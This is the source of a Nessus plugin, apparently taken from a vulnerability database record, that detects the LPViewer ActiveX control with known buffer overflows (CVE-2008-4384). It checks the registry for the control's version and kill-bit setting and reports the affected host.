"#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(34472);\n script_version(\"1.13\");\n\n script_cve_id(\"CVE-2008-4384\");\n script_bugtraq_id(31604);\n script_xref(name:\"CERT\", value:\"848873\");\n script_xref(name:\"Secunia\", value:\"32140\");\n\n script_name(english:\"LPViewer ActiveX Control Multiple Buffer Overflow Vulnerabilities\");\n script_summary(english:\"Checks for LPViewer control\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has an ActiveX control that is affected by\nmultiple remote buffer overflows.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host contains the LPViewer ActiveX control, initially\ncreated by MGI Software but later taken over by Roxio and then again\nby iseemedia.\n\nThis control reportedly has stack-based buffer overflows in its\n'url()', 'toolbar()', and 'enableZoomPastMax()' methods. If an\nattacker can trick a user on the affected host into viewing a\nspecially crafted HTML document, he can leverage these issues to\nexecute arbitrary code on the affected system subject to the user's\nprivileges.\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Unknown at this time.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'iseemedia / Roxio / MGI Software LPViewer ActiveX Control Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(119);\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2008/10/22\");\n script_cvs_date(\"Date: 2018/07/14 1:59:37\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"local\");\nscript_end_attributes();\n\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2008-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_activex_func.inc\");\n\n\nif (!get_kb_item(\"SMB/Registry/Enumerated\")) exit(0);\n\n\n# Locate the file used by the controls.\nif (activex_init() != ACX_OK) exit(0);\n\nclsid = '{3F0EECCE-E138-11D1-8712-0060083D83F5}';\nfile = activex_get_filename(clsid:clsid);\nif (file)\n{\n ver = activex_get_fileversion(clsid:clsid);\n\n if (ver) ver = string(\"Version \", ver);\n else ver = string(\"An unknown version\");\n\n report = NULL;\n if (report_paranoia > 1)\n report = string(\n \"\\n\",\n ver, \" of the vulnerable control is installed as :\\n\",\n \"\\n\",\n \" \", file, \"\\n\",\n \"\\n\",\n \"Note, though, that Nessus did not check whether the kill bit was\\n\",\n \"set for the control's CLSID because of the Report Paranoia setting\\n\",\n \"in effect when this scan was run.\\n\"\n );\n else if (activex_get_killbit(clsid:clsid) == 0)\n report = string(\n \"\\n\",\n ver, \" of the vulnerable control is installed as :\\n\",\n \"\\n\",\n \" \", file, \"\\n\",\n \"\\n\",\n \"Moreover, its kill bit is not set so it is accessible via Internet\\n\",\n \"Explorer.\\n\"\n );\n if (report)\n {\n if (report_verbosity) security_hole(port:kb_smb_transport(), extra:report);\n else security_hole(kb_smb_transport());\n }\n}\nactivex_end();\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}
